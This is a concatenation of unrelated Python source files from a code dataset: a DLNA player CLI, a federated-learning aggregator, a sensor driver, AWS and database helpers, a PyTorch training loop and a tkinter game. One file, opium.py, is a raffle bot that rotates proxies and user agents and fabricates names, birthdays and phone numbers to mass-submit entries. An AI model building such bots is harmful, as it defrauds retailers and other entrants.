time.time()\n while True:\n if time.time() - start > timeout:\n # timed out\n break\n r, w, x = select.select([sock], [], [sock], 1)\n if sock in r:\n data, addr = sock.recvfrom(1024)\n if ip and addr[0] != ip:\n continue\n\n d = DlnapDevice(data, addr[0])\n if d not in devices:\n if not name or name.lower() in d.name.lower():\n devices.append(d)\n\n if ip:\n # no need in further searching by ip\n break\n elif sock in x:\n raise Exception('Getting response failed')\n else:\n # Nothing to read\n pass\n return devices\n\nif __name__ == '__main__':\n import getopt\n\n def usage():\n print('{} [--list] [--ip <device ip>] [-d[evice] <name>] [--all] [-t[imeout] <seconds>] [--play <url>]'.format(__file__))\n\n def version():\n print(__version__)\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hvd:t:i:\", ['help', 'version', 'log=', 'ip=', 'play=', 'pause', 'stop', 'list', 'device=', 'timeout=', 'all'])\n except getopt.GetoptError:\n usage()\n sys.exit(1)\n\n device = ''\n url = ''\n timeout = 0.5\n action = ''\n logLevel = logging.WARN\n compatibleOnly = True\n ip = ''\n for opt, arg in opts:\n if opt in ('-h', '--help'):\n usage()\n sys.exit(0)\n elif opt in ('-v', '--version'):\n version()\n sys.exit(0)\n elif opt in ('--log'):\n if arg.lower() == 'debug':\n logLevel = logging.DEBUG\n elif arg.lower() == 'info':\n logLevel = logging.INFO\n elif arg.lower() == 'warn':\n logLevel = logging.WARN\n elif opt in ('--all'):\n compatibleOnly = False\n elif opt in ('-d', '--device'):\n device = arg\n elif opt in ('-t', '--timeout'):\n timeout = float(arg)\n elif opt in ('-i', '--ip'):\n ip = 
arg\n compatibleOnly = False\n timeout = 10\n elif opt in ('--list'):\n action = 'list'\n elif opt in ('--play'):\n action = 'play'\n url = arg\n elif opt in ('--pause'):\n action = 'pause'\n elif opt in ('--stop'):\n action = 'stop'\n\n logging.basicConfig(level=logLevel)\n\n st = URN_AVTransport if compatibleOnly else SSDP_ALL\n allDevices = discover(name=device, ip=ip, timeout=timeout, st=st)\n if not allDevices:\n print('No compatible devices found.')\n sys.exit(1)\n\n if action in ('', 'list'):\n print('Discovered devices:')\n for d in allDevices:\n print(' {} {}'.format('[a]' if d.has_av_transport else '[x]', d))\n sys.exit(0)\n\n d = allDevices[0]\n print(d)\n if action == 'play':\n try:\n d.set_current(url=url)\n d.play()\n except Exception as e:\n print('Device is unable to play media.')\n logging.warn('Play exception:\\n{}'.format(traceback.format_exc()))\n sys.exit(1)\n elif action == 'pause':\n d.pause()\n elif action == 'stop':\n d.stop()\n","sub_path":"dlnap/dlnap.py","file_name":"dlnap.py","file_ext":"py","file_size_in_byte":13413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"641014195","text":"#\n# Copyright 2016 The BigDL Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport pickle\nimport logging\nimport threading\nfrom torch import nn\nimport torch\nfrom bigdl.ppml.fl.nn.utils import ndarray_map_to_tensor_map\nfrom bigdl.dllib.utils.log4Error import invalidInputError\nfrom threading import Condition\n\n\nclass Aggregator(object):\n def __init__(self,\n client_num=1) -> None:\n self.model = None\n self.client_data = {'train':{}, 'eval':{}, 'pred':{}}\n self.server_data = {'train':{}, 'eval':{}, 'pred':{}}\n self.client_num = client_num\n self.condition = Condition()\n self._lock = threading.Lock()\n logging.info(f\"Initialized Pytorch aggregator [client_num: {client_num}]\")\n\n\n def set_meta(self, loss_fn, optimizer):\n with self._lock:\n self.set_loss_fn(loss_fn)\n optimizer_cls = pickle.loads(optimizer.cls)\n optimizer_args = pickle.loads(optimizer.args)\n self.set_optimizer(optimizer_cls, optimizer_args)\n\n\n def set_loss_fn(self, loss_fn):\n self.loss_fn = loss_fn\n\n def set_optimizer(self, optimizer_cls, optimizer_args):\n if len(list(self.model.parameters())) == 0:\n self.optimizer = None\n return\n self.optimizer = optimizer_cls(self.model.parameters(), **optimizer_args)\n\n def put_client_data(self, client_id, data, phase):\n self.condition.acquire()\n self.client_data[phase][client_id] = data\n logging.debug(f'server receive data [{client_id}], \\\ngot {len(self.client_data[phase])}/{self.client_num}')\n \n if len(self.client_data[phase]) == self.client_num: \n logging.debug('server received all client data, start aggregate')\n self.aggregate(phase)\n logging.debug('clearing client data')\n self.client_data[phase] = {}\n self.condition.notify_all() \n else:\n logging.debug(f'[{client_id}] waiting')\n self.condition.wait()\n self.condition.release()\n\n\n def aggregate(self, phase):\n 
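# Aggregate one round for the given phase: gather each client's 'input'
        # tensor (and the shared 'target'), sort the inputs by client ID so the
        # order is stable, run the server-side model, and in the 'train' phase
        # send every client the gradient w.r.t. its own input plus the loss.
        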
input, target = [], None\n # to record the order of tensors with client ID\n for cid, ndarray_map in self.client_data[phase].items():\n for k, v in ndarray_map.items():\n if k == 'input':\n input.append((cid, torch.from_numpy(v)))\n elif k == 'target':\n target = torch.from_numpy(v)\n else:\n invalidInputError(False,\n f'Invalid type of tensor map key: {k},'\n f' should be input/target')\n # input is a list of tensors\n\n # x = torch.stack(input)\n # x = torch.sum(x, dim=0)\n # x.requires_grad = True\n # pred = self.model(x)\n\n # sort the input tensor list in order to keep the order info of client ID\n def sort_by_key(kv_tuple):\n return kv_tuple[0]\n \n input.sort(key=sort_by_key)\n tensor_list = []\n for cid, input_tensor in input:\n input_tensor.requires_grad = True\n tensor_list.append(input_tensor)\n\n if phase == 'train':\n pred = self.model(tensor_list)\n loss = self.loss_fn(pred, target)\n if self.optimizer is not None:\n self.optimizer.zero_grad()\n loss.backward()\n if self.optimizer is not None:\n self.optimizer.step()\n\n for cid, input_tensor in input:\n grad_map = {'grad': input_tensor.grad.numpy(), 'loss': loss.detach().numpy()}\n self.server_data['train'][cid] = ndarray_map_to_tensor_map(grad_map)\n elif phase == 'eval':\n pass\n elif phase == 'pred':\n pred = self.model(tensor_list)\n for cid, input_tensor in input:\n pred_map = {'pred': pred.detach().numpy()}\n self.server_data['pred'][cid] = ndarray_map_to_tensor_map(pred_map)\n else:\n invalidInputError(False,\n f'Invalid phase: {phase}, should be train/eval/pred')\n","sub_path":"python/ppml/src/bigdl/ppml/fl/nn/pytorch/aggregator.py","file_name":"aggregator.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"123827032","text":"# This program is distributed under Apache License Version 2.0\n#\n# © Albertas Mickenas, 2016\n# mic@wemakethings.net\n# albertas@technariumas.lt\n#\n\nimport time\n\nclass SHT2x:\n\ti2c = []\n\tADDR = 64\n\n\tPOLYNOMIAL = 0x131 # POLYNOMIAL x8 + x5 + x4 +1.\n\n\tCMD_READ_TEMPERATURE_hold = 0xE3\n\tCMD_READ_HUMIDITY_hold = 0xE5\n\n\tCMD_READ_TEMPERATURE = 0xF3\n\tCMD_READ_HUMIDITY = 0xF5\n\tCMD_READ_REGISTER = 0xE7\n\tCMD_WRITE_REGISTER = 0xE6\n\tCMD_RESET \t\t\t = 0xFE\n\n\tdef __init__(self, _i2c):\n\t\tself.i2c = _i2c\n\n\tdef CheckCRC(self, buf):\n\t\tPOLYNOMIAL = 0x131 # POLYNOMIAL x8 + x5 + x4 +1.\n\t\tcrc = 0\n\t\tfor i in range(2):\n\t\t\tcrc ^= buf[i]\n\t\t\tfor bit in range(8):\n\t\t\t\tif (crc & 0x80):\n\t\t\t\t\tcrc = (crc << 1) ^ POLYNOMIAL\n\t\t\t\telse:\n\t\t\t\t\tcrc = (crc << 1)\n\t\treturn crc\n\n\tdef toTemperature(self, buf):\n\t\tif buf == False:\n\t\t\tprint(\"CRC Error...\\r\\n\")\n\t\t\treturn False\n\t\telse:\n\t\t\treturn -46.85 + 175.72 * ((buf[0] << 8) + buf[1]) /2**16\n\n\tdef toHumidity(self, buf):\n\t\tif buf == False:\n\t\t\tprint(\"CRC Error...\\r\\n\")\n\t\t\treturn False\n\t\telse:\n\t\t\treturn -6 + 125.0 * ((buf[0] << 8) + buf[1]) / 2**16\n\n\tdef decodeUserReg(self, buf):\n\t\treg = buf[0]\n\t\tret = []\n\t\tif(0b10000001 & reg == 0b10000001):\n\t\t\tret.append(\"11bits\")\n\t\telif(0b10000001 & reg == 0b10000000):\n\t\t\tret.append(\"RH 10bit T 13bit\")\n\t\telif(0b10000001 & reg == 0b00000001):\n\t\t\tret.append(\"RH 8bit T 12bit\")\n\t\telif(0b10000001 & reg == 0b00000000):\n\t\t\tret.append(\"RH 12bit T 14bit\")\n\t\t\n\t\tif(0b01000000 & reg == 0b01000000):\n\t\t\tret.append(\"VDD < 2.5\")\n\t\telse:\n\t\t\tret.append(\"VDD > 2.5\")\n\n\t\tif(0b00000100 & 
reg == 0b00000100):\n\t\t\tret.append(\"heater ON\")\n\t\telse:\n\t\t\tret.append(\"heater OFF\")\n\n\t\tif(0b00000010 & reg == 0b00000010):\n\t\t\tret.append(\"OTP reload disabled\")\n\t\telse:\n\t\t\tret.append(\"OTP reload enabled\")\n\n\t\treturn ret\n\n\tdef runI2CCommand(self, command, bytesToRead):\n\t\tb = bytearray(1)\n\t\tb[0] = command\n\n\t\tself.i2c.writeto(self.ADDR, b)\n\n\t\tif(bytesToRead > 0):\n\t\t\trecv = bytearray(bytesToRead)\n\t\t\tretryCounter = 0\n\t\t\tdone = False\n\t\t\twhile retryCounter < 15 and not done:\n\t\t\t\t# count every attempt, so persistent I2C errors cannot loop forever\n\t\t\t\tretryCounter = retryCounter + 1\n\t\t\t\ttry:\n\t\t\t\t\tself.i2c.readfrom_into(self.ADDR, recv)\n\t\t\t\t\tdone = True\n\t\t\t\texcept:\n\t\t\t\t\ttime.sleep(0.01)\n\t\t\t#print(hex(recv[0])+' '+hex(recv[1])+' '+hex(recv[2]))\n\t\t\t#print(\"\\r\\n\")\n\t\t\tif (self.CheckCRC(recv) == recv[2]):\n\t\t\t\t#print('success...\\r\\n')\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t#print('Failed...')\n\t\t\t\treturn False\n\t\t\treturn recv\n\n\tdef getTemperature(self):\n\t\treturn self.toTemperature(self.runI2CCommand(self.CMD_READ_TEMPERATURE, 3))\n\n\tdef getHumidity(self):\n\t\treturn self.toHumidity(self.runI2CCommand(self.CMD_READ_HUMIDITY, 3))\n\n\tdef getUserRegister(self):\n\t\treturn self.decodeUserReg(self.runI2CCommand(self.CMD_READ_REGISTER, 1))\n\n\tdef setUserRegister(self, register):\n\t\tb = bytearray(2)\n\t\tb[0] = self.CMD_WRITE_REGISTER\n\t\tb[1] = register & 0b11000111\n\t\tself.i2c.writeto(self.ADDR, b)\n\n\tdef reset(self):\n\t\tself.runI2CCommand(self.CMD_RESET, 0)\n\n","sub_path":"sht2x.py","file_name":"sht2x.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"158034725","text":"\"\"\"\nget a list of harddrive strings for every Host from rethinkdb\nconvert it to a dict and update it in rethinkdb\n\"\"\"\nimport rethinkdb as r\n# from collections import OrderedDict\nfrom pon import config\nCONFIG = config.Config()\n\nr.connect(\n    host=CONFIG.get('rethinkdb', 'hostname'),\n    port=CONFIG.get('rethinkdb', 'port'),\n    db=CONFIG.get('rethinkdb', 'dbname')\n).repl()\n\n\nif __name__ == '__main__':\n    # get harddrives and fqdn\n    for doc in r.table('hosts').filter(\n            (r.row['facts']['is_virtual'] == 'false')).pluck(\n            'harddrives', {'facts': 'fqdn'}).run():\n        drives = {}\n        # continue if it's already done\n        if isinstance(doc['harddrives'], dict):\n            continue\n        keys = doc['harddrives'][0].split(';')[1:]\n        for drive in doc['harddrives'][1:]:\n            values = drive.split(';')\n            drive_id = values.pop(0)\n            drives[drive_id] = {}\n            for index, value in enumerate(values):\n                drives[drive_id][keys[index]] = value\n\n        r.table('hosts').filter(\n            r.row['facts']['fqdn'] == doc['facts']['fqdn']).update(\n            {'harddrives': drives}).run()\n","sub_path":"harddrives2json.py","file_name":"harddrives2json.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"497869532","text":"import os\nimport json\nimport glob\nfrom os import path, mkdir\nfrom shutil import rmtree\n\n\nclass Cache:\n    def __init__(self, verbose=False):\n        self.cache_dir = \"/tmp/awsmap-cache\"\n        self.verbose = verbose\n        if not path.exists(self.cache_dir):\n            mkdir(self.cache_dir)\n\n    def p(self, msg):\n        if self.verbose:\n            print(msg)\n\n    def clear(self):\n        rmtree(self.cache_dir)\n        # for f in glob.glob(\"{}/**\".format(self.cache_dir)):\n        #     os.remove(f)\n\n    def get_cache(self, cache_key):\n        cache_file = 
\"{}/{}\".format(self.cache_dir, cache_key)\n if '/' in cache_key:\n account_dir = \"{}/{}\".format(self.cache_dir, cache_key.split(\"/\")[0])\n if not path.exists(account_dir):\n mkdir(account_dir)\n\n if not path.exists(cache_file):\n print(cache_file)\n return False\n else:\n return json.loads(open(cache_file).read())\n\n def set_cache(self, cache_key, data):\n cache_file = \"{}/{}\".format(self.cache_dir, cache_key)\n self.p(\"Setting cache: {}\".format(cache_file))\n f = open(cache_file, 'w')\n j_data = json.dumps(data, indent=4, sort_keys=True, default=str)\n f.write(j_data)\n return json.loads(j_data)\n","sub_path":"lib/awsmap/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"260028108","text":"import random\nimport string\nimport sys\nimport time\nfrom random import choice\nfrom threading import Thread\n\nimport names\nimport requests\nfrom colorama import Fore, init\n\nfrom config.useragents import ua\nfrom helpers.custom_logging import log\nfrom helpers.functions import (choose_random_n, gen_birthday, gen_phone,\n get_config, get_proxy2, get_time, read_from_txt, stop_program)\n\nfrom config.app_config import home, PATH_CONFIG, PATH_IMAGES, PATH_INSTA, PATH_LOG, PATH_VERIF, PATH_ACC\nfrom pathlib import Path\n\ndef account(l, proxy_list, s, fname, lname, email, password, birthday):\n try:\n headers = {\n 'authority': 'www.opiumparis.com',\n 'cache-control': 'max-age=0',\n 'origin': 'https://www.opiumparis.com',\n 'upgrade-insecure-requests': '1',\n 'content-type': 'application/x-www-form-urlencoded',\n 'user-agent': choice(ua),\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-user': '?1',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'sec-fetch-site': 'same-origin',\n 'referer': l,\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'\n }\n data = {\n 'id_customer': '',\n 'id_gender': '1',\n 'firstname': fname,\n 'lastname': lname,\n 'email': email,\n 'password': password,\n 'birthday': birthday,\n 'submitCreate': '1'\n }\n s.proxies = get_proxy2(proxy_list)\n content = s.post(l, headers=headers, data=data, timeout=10)\n if content.status_code != 200:\n log('e', Fore.RED + get_time() + 'Connection Error, rotating proxy...')\n return\n return content\n except (requests.exceptions.ProxyError, requests.exceptions.SSLError):\n pass\n except Exception as e:\n log('e', Fore.RED + get_time() + 'An exception occured: ' + str(e))\n time.sleep(2)\n sys.exit()\n\n\ndef entry(s, proxy_list, email):\n try:\n config = get_config()\n fname = names.get_first_name()\n lname = names.get_last_name()\n password = ''.join(random.choices(string.ascii_letters + string.digits, k=10))\n method = config['profile']['Email_type']\n \n birthday = gen_birthday()\n link = config['link_opium']\n\n sizelist = ['7 US - 40 EU', '7.5 US - 40.5 EU', '8 US - 41 EU', '8.5 US - 42 EU', '9 US - 42.5 EU', '9.5 US - 43 EU', '10 US - 44 EU', '10.5 US - 44.5 EU', '11 US - 45 EU', '11.5 US - 45.5 EU', '12 US - 46 EU', '12.5 US - 47 EU', '13 US - 47.5 EU']\n sizenum = random.randint(config['opium_size_1'], config['opium_size_2'])\n size = sizelist[sizenum]\n _l = link\n # log('i', Fore.GREEN + get_time() + \"Account Created !\")\n headers = {\n 'sec-fetch-mode': 'cors',\n 'origin': 'https://www.opiumparis.com',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n 'x-requested-with': 'XMLHttpRequest',\n 'user-agent': 
choice(ua),\n 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'accept': 'application/json, text/javascript, */*; q=0.01',\n 'referer': link,\n 'authority': 'www.opiumparis.com',\n 'sec-fetch-site': 'same-origin'\n }\n m2 = birthday.strip().split('/')\n neww = m2[2] + '-' + m2[1] + '-' + m2[0]\n data = {\n 'lastname': lname,\n 'firstname': fname,\n 'birthday': neww,\n 'size': size,\n 'email': email,\n 'phone': gen_phone(),\n 'cgv': '1',\n 'action': 'Raffle'\n }\n response = s.post(_l, headers=headers, data=data, timeout=10)\n if response.status_code not in (200, 201):\n log('e', Fore.RED + get_time() + \"Entry could not be submitted with status code [%s], trying again ...\" % response.status_code)\n entry(s, proxy_list, email)\n else:\n log('s', Fore.GREEN + get_time() + \"Entry submitted ! [%s]\" % email)\n with open(Path(PATH_LOG + \"opium.txt\"), 'a') as _account:\n _account.write(email + '\\n')\n\n \"\"\"\n if method == 'email':\n remove_email(path, email)\n \"\"\"\n\n except Exception as e:\n log('i', Fore.RED + get_time() + str(e))\n\n\ndef main():\n try:\n tc = int(input('How many entries ? -> '))\n except ValueError:\n log('i', Fore.RED + get_time() + \"Please input a number\")\n stop_program()\n requests.packages.urllib3.disable_warnings()\n\n config = get_config()\n delay = config['profile']['Delay']\n try:\n proxies = read_from_txt(Path(PATH_CONFIG + \"proxies.txt\"))\n except Exception:\n log('i', Fore.RED + get_time() + \"Proxy file is empty, please input some proxies.\")\n stop_program()\n try:\n emails = read_from_txt(Path(PATH_ACC + \"opium.txt\"))\n except Exception:\n log('i', Fore.RED + get_time() + \"Email file is empty, please input some emails.\")\n stop_program()\n log('i', Fore.CYAN + get_time() + str(len(proxies)) + \" proxies loaded.\")\n\n threads = []\n\n randomly_selected_emails = choose_random_n(emails, tc)\n\n for i in range(tc):\n s = requests.session()\n email = randomly_selected_emails[i].strip().split(':')[0]\n t = Thread(target=entry, args=(s, proxies, email,))\n \n threads.append(t)\n t.start()\n time.sleep(int(delay))\n\n for t in threads:\n t.join()\n time.sleep(2)\n\n\nif __name__ == '__main__':\n init(autoreset=True)\n main()\n","sub_path":"Desktop/Breaker-Raffle/scripts/opium.py","file_name":"opium.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"476663348","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 22 14:00:19 2019\n\n@author: rober\n\"\"\"\n\nimport numpy as np\nimport torch\nimport random\n\n\ndef batch_generator(X, Y, n_batches): \n \n random.seed(0)\n \n batch_size = X.shape[0] // n_batches\n \n idx = list(X.index)\n random.shuffle(idx) \n idx = idx[:n_batches*batch_size]\n \n for i in range(n_batches): \n bi = np.random.choice(idx, batch_size, replace=False)\n X_batch = X.loc[bi]\n Y_batch = Y.loc[bi]\n idx = [i for i in idx if i not in bi]\n yield (X_batch,Y_batch)\n \n \ndef comb_error(output, target, sig2):\n output = (output + 0.0001)*0.999 #help avoid numerical errors\n p = target[:,0]\n \n logErr1 = torch.mul(torch.log(output[:,0]), p)\n logErr2 = torch.mul(torch.log(1 - output[:,0]) , (1 - p))\n mseErr = torch.mul(torch.pow(target[:,1] - output[:,1], 2), (1 - p))\n \n logErr1 = -1 * torch.sum(logErr1)\n logErr2 = -1 * torch.sum(logErr2)\n mseErr = torch.sum(mseErr) \n \n return (1/output.shape[0]) * (logErr1 + logErr2 + (1/sig2)*mseErr) \n \n\ndef mae_error(output, target): \n y = target\n yhat = 
np.squeeze(output)\n MAE = np.mean(np.absolute(y - yhat)) \n return MAE \n\n\ndef fmapper(x):\n y = x.copy()\n y[x<9] = 1\n y[(x>=9) & (x<53)] = 2\n y[(x>=53) & (x<172)] = 3\n y[x>=172] = 4 \n return y\n\n\n\ndef hrat_error(output, target):\n y = target\n yhat = np.squeeze(output) \n yhat = fmapper(yhat)\n y = fmapper(y) \n hr = np.sum((yhat==y)*1)/len(y) \n return (1-hr) \n\n\n\ndef fit(X, X_val, Y, Y_val, net, optimizer, error, val_error, n_epochs, \n n_batches, batch_to_avg, ep_to_check, clipping, PATH, device, verbose, min_val_loss = float('inf')):\n \n torch.manual_seed(0)\n net = net.to(device)\n \n losses = []\n val_losses = []\n\n val_inputs = torch.FloatTensor(X_val.values)\n val_labels = torch.FloatTensor(Y_val)\n val_inputs, val_labels = val_inputs.to(device), val_labels.to(device) \n \n \n for epoch in range(n_epochs): # loop over the dataset multiple times\n \n running_loss = 0\n \n # zero the parameter gradients\n optimizer.zero_grad()\n \n counter = 0\n \n for batch_x, batch_y in batch_generator(X, Y, n_batches): \n \n counter += 1 \n \n net.train()\n # get the inputs\n inputs = torch.FloatTensor(batch_x.values)\n labels = torch.FloatTensor(batch_y.values)\n inputs, labels = inputs.to(device), labels.to(device) \n \n \n # forward + backward + optimize\n outputs = net.forward(inputs)\n loss = error(outputs, labels)\n \n loss.backward() \n \n running_loss += loss.item() \n \n if counter % batch_to_avg == 0:\n \n torch.nn.utils.clip_grad_norm_(net.parameters(), clipping) \n \n optimizer.step()\n optimizer.zero_grad() \n \n \n running_loss = running_loss/n_batches \n \n with torch.no_grad():\n net.eval()\n val_outputs = net.forward(val_inputs)\n \n val_outputs2, val_labels2 = val_outputs.cpu(), val_labels.cpu()\n val_outputs2, val_labels2 = val_outputs2.numpy(), val_labels2.numpy()\n \n val_loss = val_error(val_outputs2, val_labels2)\n \n losses.append(running_loss)\n val_losses.append(val_loss) \n \n \n if verbose == 1:\n print('Epoch {0}: Training Loss: {1}, Validation Loss: {2}'\\\n .format(epoch+1, running_loss, val_loss))\n \n \n \n if (epoch % ep_to_check == 0) and (epoch >= ep_to_check):\n \n mean_val_loss = np.mean(val_losses[-ep_to_check:])\n \n \n if mean_val_loss < min_val_loss:\n torch.save(net.state_dict(), PATH)\n if verbose == 1:\n print('New Checkpoint Saved into PATH')\n min_val_loss = mean_val_loss\n \n return (losses, val_losses, min_val_loss)\n ","sub_path":"2 PART MIXTURE/fit10_nn.py","file_name":"fit10_nn.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"620483706","text":"from chalice import Chalice, Response\nimport boto3\n\nsqs = boto3.client('sqs')\n\n\nQUEUE_NAME = 'chalice-demo-queue'\n\n\ndef create_queue():\n try:\n queue = sqs.create_queue(QueueName=QUEUE_NAME, Attributes={\"DelaySeconds\": \"5\"})\n print(queue)\n return {'success': True, 'message': f'queue with name {QUEUE_NAME} created', 'status': 200}\n\n except Exception as e:\n print(e)\n return {'status_code': 400}\n\n\ndef send_message(message_body):\n try:\n queue_res = sqs.get_queue_url(QueueName=QUEUE_NAME)\n print(queue_res)\n queue_url = queue_res['QueueUrl']\n response = sqs.send_message(QueueUrl=queue_url, DelaySeconds=10, MessageBody=message_body)\n return {'status': 200, 'message': 'Message sent {}'.format(response['MessageId'])}\n except Exception as e:\n print(e)\n return {'status': 400, 'message': \"unable to send sqs message\"}\n\n\ndef get_messages():\n try:\n queue_response = 
sqs.get_queue_url(QueueName=QUEUE_NAME)\n queue_url = queue_response['QueueUrl']\n response = sqs.receive_message(\n QueueUrl=queue_url,\n AttributeNames=[\n 'SentTimestamp'\n ],\n MaxNumberOfMessages=10,\n MessageAttributeNames=[\n 'All'\n ],\n VisibilityTimeout=20,\n WaitTimeSeconds=20\n )\n\n messages = response['Messages']\n\n return messages\n\n except Exception as e:\n print(str(e))\n # app.log.error('error occurred during creating queue')\n return {\"Error\": 'error occurred during sending message queue' + str(e), \"status_code\": 400}\n","sub_path":"my-app/chalicelib/sqs_service.py","file_name":"sqs_service.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"344410466","text":"import tkinter\r\nfrom tkinter import *\r\nimport time \r\nimport random\r\n\r\n\r\n#Counter class for counter object\r\nclass Counter(object):\r\n def __init__(self):\r\n self._counter = 0\r\n \r\n def getCounter(self):\r\n return self._counter\r\n\r\n def increment(self):\r\n self._counter = self._counter + 1\r\n score[\"text\"] = self._counter\r\n \r\n def decrement(self): #used for rocket percentage\r\n self._counter = self._counter - 1\r\n \r\n def reset(self):\r\n self._counter = 0\r\n \r\n counter = property(getCounter)\r\n\r\n \r\n#rocket class, object will have different values for each component\r\nclass RocketSpecs:\r\n def __init__(self,weight,power):\r\n self.weight = weight\r\n self.power = power\r\n \r\n def getWeight(self):\r\n return self.weight\r\n \r\n def getPower(self):\r\n return self.power\r\n \r\n def weightinc(self):\r\n self.weight += 1\r\n \r\n def powerinc(self):\r\n self.power += 1\r\n \r\n def resetWeight(self):\r\n self.weight = 0\r\n \r\nrocket = RocketSpecs(0,0)\r\n\r\n\r\n#gets the time and draws thwe rectangle in random position when start button pressed or when rectangle clicked\r\ndef cb2():\r\n canvas.delete(ALL)\r\n global timer1\r\n timer1 = time.time()\r\n randomx = random.randint(0,300)\r\n randomy = random.randint(0,250)\r\n rectangle = canvas.create_rectangle(randomx, randomy, randomx+30 , randomy+30, fill=\"blue\", outline=\"red\")\r\n canvas.tag_bind(rectangle, \"<ButtonPress-1>\", addCounter)\r\n\r\n\r\n#increments counter when rectangle clicked on \r\ndef addCounter(event):\r\n global timer2\r\n timer2 = time.time()\r\n if (timer2 - timer1) < 2:\r\n counter.increment()\r\n canvas.delete(ALL)\r\n cb2()\r\n \r\n\r\n \r\n\r\ncounter = Counter()\r\n\r\n\r\n#function which draws the initial unfinished snowman picture, awaits keyboard input\r\ndef house():\r\n clearForGame()\r\n frame5.grid_remove()\r\n canvas.delete(ALL)\r\n frame2.grid_remove()\r\n frame6.grid_remove()\r\n score.grid_remove()\r\n nameLabel.grid()\r\n nameButton.grid()\r\n dinput.grid()\r\n points1 = [15,200,60,25,60,25,115,200,115,200,15,200]\r\n tree = canvas.create_polygon(points1,outline=\"green\",fill=\"green\",width=6)\r\n snowmanBottom = canvas.create_oval(250,150,350,250,fill=\"white\")\r\n snowmanTop = canvas.create_oval(275,100,325,165,fill=\"white\")\r\n ground = canvas.create_rectangle(0,250,400,300, fill=\"white\")\r\n canvas.create_rectangle(55,203,75,250,fill=\"brown\")\r\n canvas.configure(bg=\"black\")\r\n instructionLabel[\"text\"] = \"Merry Christmas!\\n\\n INSTRUCTIONS \\n Finish the picture:\\n Star: 't'\\n Lights: 'r'\\n Present: 'e'\\n Eyes: 's' \\nCarrot: 'h'\\n Arm: 'd'\\n Buttons: 'g'\\n Add Hat: 'y'\\n RESTART: 'f'\"\r\n \r\n master.bind(\"<Key>\", keyAdd)\r\n 
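# a new drawing round is starting, so clear the click-game score as well
    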
counter.reset()\r\n score[\"text\"] = 0\r\n\r\n#each function in this class corresponds to a keyboard input which determines what is drawn\r\nclass presents:\r\n def __init__(self, x, y, x2, y2):\r\n self.x = x\r\n self.y = y\r\n self.x2 = x2\r\n self.y2 = y2\r\n\r\n def drawPresent():\r\n p1 = presents(81, 215, 120, 251)\r\n present = canvas.create_rectangle(p1.x,p1.y,p1.x2,p1.y2,fill=\"red\")\r\n wrappingy = canvas.create_line(p1.x+21,p1.y+1,p1.x2-19,p1.y2-1,fill=\"yellow\", width=5)\r\n wrappingx = canvas.create_line(p1.x+1,p1.y+18,p1.x2-1,p1.y2-18,fill=\"yellow\",width=5)\r\n\r\n \r\n\r\n def drawHat():\r\n hb = presents(270,95,330,110) \r\n htop = presents(280,60,320,96)\r\n bottom = canvas.create_rectangle(hb.x,hb.y,hb.x2,hb.y2,fill=\"gray40\", outline=\"red\")\r\n top = canvas.create_rectangle(htop.x,htop.y,htop.x2,htop.y2,fill=\"gray40\", outline=\"red\")\r\n\r\n def drawCarrot():\r\n carrot = canvas.create_polygon(294,135,302,135,302,135,298,160,298,160,294,135, outline=\"orange\", fill=\"orange\")\r\n\r\n def drawButtons():\r\n buttons_list = [175, 200, 225]\r\n for button in buttons_list:\r\n canvas.create_oval(292,button,304,button+10,fill=\"black\")\r\n\r\n def drawStar():\r\n star_points = [60,17,40,25,60,17,80,25,80,25,65,10,65,10,80,5,80,5,65,0,40,25,55,10,55,10,40,5,40,5,55,0]\r\n canvas.create_polygon(star_points, fill=\"yellow\",outline=\"yellow\", width=5)\r\n\r\n def drawLights():\r\n row = [50,62,75]\r\n row1 = [38,50,62,74,85]\r\n row2 = [27,39,51,63,75,87,99]\r\n for light in row:\r\n canvas.create_oval(light,light+5,light+10,light,fill=\"white\")\r\n for light1 in row1:\r\n canvas.create_oval(light1,light1+50,light1+10,light1+45,fill=\"red\")\r\n for light2 in row2:\r\n canvas.create_oval(light2,light2+100,light2+10,light2+95,fill=\"gold\")\r\n for light3 in row:\r\n canvas.create_oval(light3-23,light3+125,light3-13,light3+120,fill=\"white\")\r\n\r\n def drawBranch():\r\n branch_points = [265,165,255,170,255,170,225,145,225,145,215,160,215,160,213,143,213,143,200,155,200,155,210,140,210,140,265,165 ]\r\n canvas.create_polygon(branch_points, fill=\"brown\",outline=\"brown\", width=2)\r\n\r\n def drawEyes():\r\n eye_list = [280,304]\r\n for eye in eye_list:\r\n canvas.create_oval(eye,125,eye+12,135,fill=\"black\")\r\n\r\n#waits for 